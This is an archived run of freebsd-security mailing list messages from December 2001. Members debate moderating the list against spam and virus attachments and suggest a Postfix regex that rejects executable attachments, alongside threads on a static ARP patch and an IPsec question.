> > topic messages to this mailing list, or, for that matter, irrelevant
> > attachments.
> >
> > thank you.
> >
> > -------/ f. johan beisser /--------------------------------------+
> >   http://caustic.org/~jan                      jan@caustic.org
> >     "John Ashcroft is really just the reanimated corpse
> >          of J. Edgar Hoover." -- Tim Triche
> >
> >
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-security" in the body of the message
> >
> >
> Especially in the wake of the latest screensaver virus.
> - -- Jonathan
> 
> ___________________________________________________________
> Jonathan M. Slivko                         jslivko@core.com
> Owner, Voyager Internet Services           www.voyageri.net
>     IRC Server Co-Administrator, AsylumNet IRC Networks
> - -----------------------------------------------------------
>   FreeBSD: The Power to Serve! (http://www.freebsd.org)
> 
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.4 (SunOS)
> Comment: Made with pgp4pine 1.75-6
> 
> iD8DBQE8DtfS0r0T9plv2LkRAt2gAKDfyiOp9sfX/+Z8kAL2vNANBLdtlwCg+u6/
> wcBB/+mhhbSrNST+C4+sK9U=
> =tCLq
> -----END PGP SIGNATURE-----
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

-- 
Colin Faber
(303) 859-1491
fpsn.net, Inc.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 18:47: 8 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.hq.newdream.net (mail.hq.newdream.net [216.246.35.10])
	by hub.freebsd.org (Postfix) with ESMTP id CD60037B419
	for <freebsd-security@FreeBSD.ORG>; Wed,  5 Dec 2001 18:47:06 -0800 (PST)
Received: from zugzug.hq.newdream.net (zugzug.hq.newdream.net [127.0.0.1])
	by ravscan.zugzug.hq.newdream.net (Postfix) with SMTP id A07243B397
	for <freebsd-security@FreeBSD.ORG>; Wed,  5 Dec 2001 18:47:06 -0800 (PST)
Received: by mail.hq.newdream.net (Postfix, from userid 1012)
	id 7DB083B396; Wed,  5 Dec 2001 18:47:06 -0800 (PST)
Date: Wed, 5 Dec 2001 18:47:06 -0800
From: Owner of many system processes <william@hq.newdream.net>
To: freebsd-security@FreeBSD.ORG
Subject: Re: (WOT) Re: the best edited picture ever
Message-ID: <20011206024706.GB12011@hq.newdream.net>
Mail-Followup-To: freebsd-security@FreeBSD.ORG
References: <Pine.GSO.4.33L2.0112052028080.12775-100000@shell.core.com> <3C0EDAF2.9C9B5E06@fpsn.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3C0EDAF2.9C9B5E06@fpsn.net>
User-Agent: Mutt/1.3.24i
Organization: New Dream Network
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Colin Faber wrote:

> Another reason to moderate this list.

i agree. please, please, pretty please can we have a moderated list?
i'm on this list because i like to keep up with security related stuff,
not because i like getting lots of extra unrelated email.  i realize
moderation is a PITA for whoever has to be the moderator, but i'm sure
some folks would be willing to volunteer for this task.

-- 
William Yardley                   System Administrator, Newdream Network
william@hq.newdream.net         http://infinitejazz.net/will/pgp/gpg.asc

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 19:48:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from www.svzserv.kemerovo.su (www.svzserv.kemerovo.su [213.184.65.80])
	by hub.freebsd.org (Postfix) with ESMTP
	id DED8037B419; Wed,  5 Dec 2001 19:48:11 -0800 (PST)
Received: (from eugen@localhost)
	by www.svzserv.kemerovo.su (8.11.6/8.11.6) id fB63mGI11006;
	Thu, 6 Dec 2001 10:48:16 +0700 (KRAT)
	(envelope-from eugen)
Date: Thu, 6 Dec 2001 10:48:16 +0700
From: Eugene Grosbein <eugen@www.svzserv.kemerovo.su>
To: Ruslan Ermilov <ru@FreeBSD.ORG>
Cc: Eugene Grosbein <eugen@grosbein.pp.ru>, net@FreeBSD.ORG,
	security@FreeBSD.ORG
Subject: Re: NOARP - gateway must answer and have frozen ARP table
Message-ID: <20011206104816.A10151@svzserv.kemerovo.su>
References: <20011205124430.A83642@svzserv.kemerovo.su> <20011205040316.H40864@blossom.cjclark.org> <20011205231735.A1361@grosbein.pp.ru> <20011205193859.B79705@sunbay.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20011205193859.B79705@sunbay.com>; from ru@FreeBSD.ORG on Wed, Dec 05, 2001 at 07:38:59PM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Wed, Dec 05, 2001 at 07:38:59PM +0200, Ruslan Ermilov wrote:

> The below patch implements this facility, activated by setting the
> net.link.ether.inet.static_arp sysctl to a non-zero value.  It also
> fixes an mbuf leak in arpresolve() if IFF_NOARP flag is set on an
> interface, and an address resolution is attempted over it.
> 
> I am also going to add support for static ARP table to rc.conf(5),
> which should address PR conf/23063.
> 
> Let me know what do you think about the patch.

I tried this and this works. But our configuration demands 
that modifications of ARP table must be ignored only for some of interfaces
while others (non-public) can use ARP. So that your patch is still useless :(

Perhaps, sysctl should change meaning of NOARP flag?
This would allow more flexible per-interface scheme.
Or it might be possible to use hw.atamodes scheme.

Eugene Grosbein

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 20:25:24 2001
Delivered-To: freebsd-security@freebsd.org
Received: from pogo.caustic.org (caustic.org [64.163.147.186])
	by hub.freebsd.org (Postfix) with ESMTP id 5E68D37B405
	for <freebsd-security@FreeBSD.ORG>; Wed,  5 Dec 2001 20:25:21 -0800 (PST)
Received: from localhost (jan@localhost)
	by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id fB64PKN12585;
	Wed, 5 Dec 2001 20:25:20 -0800 (PST)
	(envelope-from jan@caustic.org)
Date: Wed, 5 Dec 2001 20:25:19 -0800 (PST)
From: "f.johan.beisser" <jan@caustic.org>
X-X-Sender:  <jan@localhost>
To: Owner of many system processes <william@hq.newdream.net>
Cc: <freebsd-security@FreeBSD.ORG>
Subject: Re: (WOT) Re: the best edited picture ever
In-Reply-To: <20011206024706.GB12011@hq.newdream.net>
Message-ID: <20011205201620.R16958-100000@localhost>
X-Ignore: This statement isn't supposed to be read by you
X-TO-THE-FBI-CIA-AND-NSA: HI! HOW YA DOIN?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Wed, 5 Dec 2001, Owner of many system processes wrote:

> Colin Faber wrote:
>
> > Another reason to moderate this list.
>
> i agree. please, please, pretty please can we have a moderated list?
> i'm on this list because i like to keep up with security related stuff,
> not because i like getting lots of extra unrelated email.  i realize
> moderation is a PITA for whoever has to be the moderator, but i'm sure
> some folks would be willing to volunteer for this task.

the real issue is that there's just enough volume on this list to make it
difficult to moderate at worst, and time consuming at best. of course,
some mailing lists (bugtraq and incidents on securityfocus.com come to
mind immediately) benifit very heavily from this. the difference, i think
is that both of those lists would normally have a MUCH worse sig/noise
ratio, if they were not moderated (bugtraq, the last i heard, had around
30,000 subscribers..)  currently, the sig/noise ratio of freebsd-security
is just about right.. that is, for me.


-------/ f. johan beisser /--------------------------------------+
  http://caustic.org/~jan                      jan@caustic.org
    "John Ashcroft is really just the reanimated corpse
         of J. Edgar Hoover." -- Tim Triche


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 20:38:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57])
	by hub.freebsd.org (Postfix) with ESMTP id B7E2E37B405
	for <freebsd-security@FreeBSD.ORG>; Wed,  5 Dec 2001 20:38:50 -0800 (PST)
Received: from fpsn.net (control.fpsn.net [63.224.69.60])
	(authenticated)
	by mail.fpsn.net (8.11.6/8.11.6) with ESMTP id fB64ceo03346;
	Wed, 5 Dec 2001 21:38:40 -0700 (MST)
Message-ID: <3C0EF641.39F0F56F@fpsn.net>
Date: Wed, 05 Dec 2001 21:38:25 -0700
From: Colin Faber <cfaber@fpsn.net>
Organization: fpsn.net, Inc.
X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: "f.johan.beisser" <jan@caustic.org>
Cc: Owner of many system processes <william@hq.newdream.net>,
	freebsd-security@FreeBSD.ORG
Subject: Re: (WOT) Re: the best edited picture ever
References: <20011205201620.R16958-100000@localhost>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

I understand the issue of people not wanting to have to take on the task
of moderating what goes onto this list;  But in any case there should at
least be strict filters on what gets through which doesn't look like has
been done,

I notice almost on a daily bases (which im sure the rest of you have
also) SPAM on both this list and on the bugs list. Totally unrelated to
the freebsd project..

Solutions suggested on how to correct such problems though the worst
thing that I can think of happening is nothing being done at all.


"

"f.johan.beisser" wrote:
> 
> On Wed, 5 Dec 2001, Owner of many system processes wrote:
> 
> > Colin Faber wrote:
> >
> > > Another reason to moderate this list.
> >
> > i agree. please, please, pretty please can we have a moderated list?
> > i'm on this list because i like to keep up with security related stuff,
> > not because i like getting lots of extra unrelated email.  i realize
> > moderation is a PITA for whoever has to be the moderator, but i'm sure
> > some folks would be willing to volunteer for this task.
> 
> the real issue is that there's just enough volume on this list to make it
> difficult to moderate at worst, and time consuming at best. of course,
> some mailing lists (bugtraq and incidents on securityfocus.com come to
> mind immediately) benifit very heavily from this. the difference, i think
> is that both of those lists would normally have a MUCH worse sig/noise
> ratio, if they were not moderated (bugtraq, the last i heard, had around
> 30,000 subscribers..)  currently, the sig/noise ratio of freebsd-security
> is just about right.. that is, for me.
> 
> -------/ f. johan beisser /--------------------------------------+
>   http://caustic.org/~jan                      jan@caustic.org
>     "John Ashcroft is really just the reanimated corpse
>          of J. Edgar Hoover." -- Tim Triche
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
" wrote:
> 
> On Wed, 5 Dec 2001, Owner of many system processes wrote:
> 
> > Colin Faber wrote:
> >
> > > Another reason to moderate this list.
> >
> > i agree. please, please, pretty please can we have a moderated list?
> > i'm on this list because i like to keep up with security related stuff,
> > not because i like getting lots of extra unrelated email.  i realize
> > moderation is a PITA for whoever has to be the moderator, but i'm sure
> > some folks would be willing to volunteer for this task.
> 
> the real issue is that there's just enough volume on this list to make it
> difficult to moderate at worst, and time consuming at best. of course,
> some mailing lists (bugtraq and incidents on securityfocus.com come to
> mind immediately) benifit very heavily from this. the difference, i think
> is that both of those lists would normally have a MUCH worse sig/noise
> ratio, if they were not moderated (bugtraq, the last i heard, had around
> 30,000 subscribers..)  currently, the sig/noise ratio of freebsd-security
> is just about right.. that is, for me.
> 
> -------/ f. johan beisser /--------------------------------------+
>   http://caustic.org/~jan                      jan@caustic.org
>     "John Ashcroft is really just the reanimated corpse
>          of J. Edgar Hoover." -- Tim Triche
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

-- 
Colin Faber
(303) 859-1491
fpsn.net, Inc.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 20:42:20 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.hq.newdream.net (mail.hq.newdream.net [216.246.35.10])
	by hub.freebsd.org (Postfix) with ESMTP id 18D4537B417
	for <freebsd-security@FreeBSD.ORG>; Wed,  5 Dec 2001 20:42:12 -0800 (PST)
Received: from zugzug.hq.newdream.net (zugzug.hq.newdream.net [127.0.0.1])
	by ravscan.zugzug.hq.newdream.net (Postfix) with SMTP id BF86C3B397
	for <freebsd-security@FreeBSD.ORG>; Wed,  5 Dec 2001 20:42:06 -0800 (PST)
Received: by mail.hq.newdream.net (Postfix, from userid 1012)
	id 9B8F83B396; Wed,  5 Dec 2001 20:42:06 -0800 (PST)
Date: Wed, 5 Dec 2001 20:42:06 -0800
From: Owner of many system processes <william@hq.newdream.net>
To: freebsd-security@FreeBSD.ORG
Subject: Re: (WOT) Re: the best edited picture ever
Message-ID: <20011206044206.GD12011@hq.newdream.net>
Mail-Followup-To: freebsd-security@FreeBSD.ORG
References: <20011205201620.R16958-100000@localhost> <3C0EF641.39F0F56F@fpsn.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3C0EF641.39F0F56F@fpsn.net>
User-Agent: Mutt/1.3.24i
Organization: New Dream Network
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Colin Faber wrote:
> 
> I notice almost on a daily bases (which im sure the rest of you have
> also) SPAM on both this list and on the bugs list. Totally unrelated
> to the freebsd project..
> 
> Solutions suggested on how to correct such problems though the worst
> thing that I can think of happening is nothing being done at all.

the lengthy discussions regarding these problems everytime another spam,
virus, or autoresponse from someone's misconfigured virus scanner get
pretty annoying too.  i realize i'm contributing to the noise by
furthering this discussion, but i do think that stripping out binary
attachments to the list except for pgp/MIME signatures would be a Good
Thing.  moderating the list would also be nice, although as someone
mentioned, perhaps not appropriate for such a forum.

closing the list to off-list subscribers seems to be the simplest
option, and while it might be annoying, there could be some sort of
alternate method of allowing people to post to the list (maybe a web
form for non-subscribers or something)?  freebsd-questions is also
non-moderated, so perhaps it would be ok to simply close this list to
off-list subscribers entirely?

-- 
William Yardley                   System Administrator, Newdream Network
william@hq.newdream.net         http://infinitejazz.net/will/pgp/gpg.asc

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 21: 5:31 2001
Delivered-To: freebsd-security@freebsd.org
Received: from scaup.prod.itd.earthlink.net (scaup.mail.pas.earthlink.net [207.217.120.49])
	by hub.freebsd.org (Postfix) with ESMTP id 1B68E37B419
	for <freebsd-security@freebsd.org>; Wed,  5 Dec 2001 21:05:28 -0800 (PST)
Received: from dialup-209.247.138.141.dial1.sanjose1.level3.net ([209.247.138.141] helo=blossom.cjclark.org)
	by scaup.prod.itd.earthlink.net with esmtp (Exim 3.33 #1)
	id 16Bqii-0001e3-00; Wed, 05 Dec 2001 21:05:20 -0800
Received: (from cjc@localhost)
	by blossom.cjclark.org (8.11.6/8.11.3) id fB654YK06231;
	Wed, 5 Dec 2001 21:04:34 -0800 (PST)
	(envelope-from cjc)
Date: Wed, 5 Dec 2001 21:04:30 -0800
From: "Crist J . Clark" <cjc@FreeBSD.ORG>
To: Owner of many system processes <william@hq.newdream.net>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: (WOT) Re: the best edited picture ever
Message-ID: <20011205210430.N3061@blossom.cjclark.org>
References: <Pine.GSO.4.33L2.0112052028080.12775-100000@shell.core.com> <3C0EDAF2.9C9B5E06@fpsn.net> <20011206024706.GB12011@hq.newdream.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20011206024706.GB12011@hq.newdream.net>; from william@hq.newdream.net on Wed, Dec 05, 2001 at 06:47:06PM -0800
X-URL: http://people.freebsd.org/~cjc/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Wed, Dec 05, 2001 at 06:47:06PM -0800, Owner of many system processes wrote:
> Colin Faber wrote:
> 
> > Another reason to moderate this list.
> 
> i agree. please, please, pretty please can we have a moderated list?
> i'm on this list because i like to keep up with security related stuff,
> not because i like getting lots of extra unrelated email.  i realize
> moderation is a PITA for whoever has to be the moderator, but i'm sure
> some folks would be willing to volunteer for this task.

If you just want notifications, join freebsd-security-notifications.
-- 
"It's always funny until someone gets hurt. Then it's hilarious."

Crist J. Clark                     |     cjclark@alum.mit.edu
                                   |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 21: 5:37 2001
Delivered-To: freebsd-security@freebsd.org
Received: from quartz.bos.dyndns.org (quartz.bos.dyndns.org [66.37.218.198])
	by hub.freebsd.org (Postfix) with ESMTP id 7BD7937B41D
	for <freebsd-security@freebsd.org>; Wed,  5 Dec 2001 21:05:32 -0800 (PST)
Received: from localhost (twilde@localhost)
	by quartz.bos.dyndns.org (8.11.5/8.11.5) with ESMTP id fB655T001842
	for <freebsd-security@freebsd.org>; Thu, 6 Dec 2001 00:05:29 -0500 (EST)
Date: Thu, 6 Dec 2001 00:05:29 -0500 (EST)
From: Tim Wilde <twilde@dyndns.org>
X-X-Sender: twilde@quartz.bos.dyndns.org
To: freebsd-security@freebsd.org
Subject: Re: the best edited picture ever (reprimand)
Message-ID: <Pine.GSO.4.40.0112060002370.25038-100000@quartz.bos.dyndns.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

I've spoken to this user off-list about their conduct in violation of the
dyndns.org AUP - if this happens again from them, on this or any other
list, rest assured that their accounts with us will be gone.  I hadn't
noticed that they were using a dyndns.org hostname until I got an abuse
complaint about it.  I don't really think this list needs moderation,
maybe just some better spam filtering - I just hit the old delete key,
both on the original messages, and on a lot of these threads complaining
about them.

Now, if we can get back to discussing security, and let this thread die!
(And, to make this a LITTLE on-topic, we use FreeBSD for most of our
systems here at dyndns.org, and we TRY to keep it secure! :))

Tim Wilde

-- 
Tim Wilde
twilde@dyndns.org
Systems Administrator
Dynamic DNS Network Services
http://www.dyndns.org/


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 21:19:54 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gaia.nimnet.asn.au (nimbin.lnk.telstra.net [139.130.45.143])
	by hub.freebsd.org (Postfix) with ESMTP id 4D3F437B416
	for <freebsd-security@FreeBSD.ORG>; Wed,  5 Dec 2001 21:19:49 -0800 (PST)
Received: from localhost (smithi@localhost)
	by gaia.nimnet.asn.au (8.8.8/8.8.8R1.2) with SMTP id QAA14095;
	Thu, 6 Dec 2001 16:19:42 +1100 (EST)
	(envelope-from smithi@nimnet.asn.au)
Date: Thu, 6 Dec 2001 16:19:42 +1100 (EST)
From: Ian Smith <smithi@nimnet.asn.au>
To: Owner of many system processes <william@hq.newdream.net>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: (WOT) Re: the best edited picture ever
In-Reply-To: <20011206044206.GD12011@hq.newdream.net>
Message-ID: <Pine.BSF.3.96.1011206155044.11905C-100000@gaia.nimnet.asn.au>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Hi William and all,

I too hate to contribute to this WOT noise, but it's been an ongoing
problem, and the level of these things especially lately is becoming
huge, and can only get worse the more people keep buying Windows ..

On Wed, 5 Dec 2001, Owner of many system processes wrote:

 > Colin Faber wrote:
[..]
 > > Solutions suggested on how to correct such problems though the worst
 > > thing that I can think of happening is nothing being done at all.
 > 
 > the lengthy discussions regarding these problems everytime another spam,
 > virus, or autoresponse from someone's misconfigured virus scanner get
 > pretty annoying too.  i realize i'm contributing to the noise by
 > furthering this discussion, but i do think that stripping out binary
 > attachments to the list except for pgp/MIME signatures would be a Good
 > Thing.  moderating the list would also be nice, although as someone
 > mentioned, perhaps not appropriate for such a forum.

I do believe that stripping irrelevant attachments (including HTML!) 
would be the best thing, and this could best be done by MIME type.  For
example, ALL of the recent so-called double-suffix virii, whatever the
final extension, were of MIME type audio/x-wav.  There's no conceivable
reason to pass audio/x-wav (and many other types) to almost any mailing
list.  Forget 'extensions', as it's only M$ that would be stupid enough
to choose whether to display, otherwise render or _execute_ attachments
based solely on the last three characters of an arbitary file name!

 > closing the list to off-list subscribers seems to be the simplest
 > option, and while it might be annoying, there could be some sort of
 > alternate method of allowing people to post to the list (maybe a web
 > form for non-subscribers or something)?  freebsd-questions is also
 > non-moderated, so perhaps it would be ok to simply close this list to
 > off-list subscribers entirely?

I get freebsd-questions as digest, for occasional utility - couldn't
handle the extra volume otherwise - but lately there've been digests
with little more than a few messages _other_ than these large virii; 
there's just no need to pass (eg) audio/x-wav attachments there, either. 

[on topic?  I'd actually like to know what can be done with majordomo to
accomplish it; we're having just this problem with a list run from here]

I don't agree that these lists need the large overhead of moderation, if
a (hopefully) simple technical fix can drastically reduce the volume of
this crap in any and all freebsd lists - including stripping HTML mail.

Cheers, Ian


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 21:42:30 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.hq.newdream.net (mail.hq.newdream.net [216.246.35.10])
	by hub.freebsd.org (Postfix) with ESMTP id A153E37B417
	for <freebsd-security@FreeBSD.ORG>; Wed,  5 Dec 2001 21:42:26 -0800 (PST)
Received: from zugzug.hq.newdream.net (zugzug.hq.newdream.net [127.0.0.1])
	by ravscan.zugzug.hq.newdream.net (Postfix) with SMTP id 7D5FF3B397
	for <freebsd-security@FreeBSD.ORG>; Wed,  5 Dec 2001 21:42:26 -0800 (PST)
Received: by mail.hq.newdream.net (Postfix, from userid 1012)
	id 52C1D3B396; Wed,  5 Dec 2001 21:42:26 -0800 (PST)
Date: Wed, 5 Dec 2001 21:42:26 -0800
From: Owner of many system processes <william@hq.newdream.net>
To: freebsd-security@FreeBSD.ORG
Subject: Re: (WOT) Re: the best edited picture ever
Message-ID: <20011206054226.GA20863@hq.newdream.net>
Mail-Followup-To: freebsd-security@FreeBSD.ORG
References: <20011206044206.GD12011@hq.newdream.net> <Pine.BSF.3.96.1011206155044.11905C-100000@gaia.nimnet.asn.au>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <Pine.BSF.3.96.1011206155044.11905C-100000@gaia.nimnet.asn.au>
User-Agent: Mutt/1.3.24i
Organization: New Dream Network
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Ian Smith wrote:
> 
> [on topic?  I'd actually like to know what can be done with majordomo
> to accomplish it; we're having just this problem with a list run from
> here]

well it looks like hub.freebsd.org is running postfix according to the
smtp banner, so assuming no one at freebsd wants to receive this type of
thing, it would be pretty trivial to block most (but not all) of this
type of stuff with regex checks. this has the advantage of getting rid
of this junk as early as possible.

assuming pcre body_checks, something like this might work (this is just
from the postfix-users list; i haven't tested it personally, but
something like this should work).  something similar could be done if
POSIX regexes are used instead....

(sorry for the long line)

/^(Content-Disposition: attachment;.*| Content-Type:.*|(\t|)+)(file)?name="?.*\.(lnk|hta|com|pif|vbs|vbe|js|jse|exe|bat|cmd|vxd|scr|shm|dll)"?$/
REJECT

however this would apply to all mail coming into the server... (although
god knows why anyone at freebsd.org would want to receive this type of
attachment, especially not zipped or tarred /gzipped.

obviously this would be up to whoever admins the freebsd mail servers...

i haven't used majordomo, so i'm not sure how to do this specifically
with that software.

> I don't agree that these lists need the large overhead of moderation,
> if a (hopefully) simple technical fix can drastically reduce the
> volume of this crap in any and all freebsd lists - including stripping
> HTML mail.

hopefully so. who is 'officially' in charge of this list?  perhaps they
could let us know if anything can be done regarding this?

-- 
William Yardley                   System Administrator, Newdream Network
william@hq.newdream.net         http://infinitejazz.net/will/pgp/gpg.asc

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 21:54:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mine.kame.net (kame195.kame.net [203.178.141.195])
	by hub.freebsd.org (Postfix) with ESMTP id 9107E37B41A
	for <freebsd-security@FreeBSD.ORG>; Wed,  5 Dec 2001 21:54:33 -0800 (PST)
Received: from localhost ([3ffe:501:41c:2000:4178:16a7:e2d4:1394])
	by mine.kame.net (8.11.1/3.7W) with ESMTP id fB65lYL01202;
	Thu, 6 Dec 2001 14:47:34 +0900 (JST)
To: jack_xiao99@hotmail.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: SA regenerated problems
In-Reply-To: Your message of "Sun, 2 Dec 2001 21:32:54 -0500"
	<OE13q9MrEB4NHOUFw0R00019700@hotmail.com>
References: <OE13q9MrEB4NHOUFw0R00019700@hotmail.com>
X-Mailer: Cue version 0.6 (011026-1440/sakane)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Message-Id: <20011206145443E.sakane@kame.net>
Date: Thu, 06 Dec 2001 14:54:43 +0900
From: Shoichi Sakane <sakane@kame.net>
X-Dispatcher: imput version 20000228(IM140)
Lines: 10
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

> I am setting up ipsec tunnels between two FreeBSD4.2 RELEASE servers and met the
>  SA regenerated problem. It seems the new SA can not be generated in time and pr
> operly some time when the SA life time is over.

at least, you should show us your SPD and SA configuration, your network
topology, your routing table and your system log.  also if you use
racoon or isakmpd, you should show us the configuration of them, and
the log file.  otherwise we cannot get what happened to you.  no one
can answer your problem.
by the way, when you check them carefully, you can get the answer.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 23:19:30 2001
Delivered-To: freebsd-security@freebsd.org
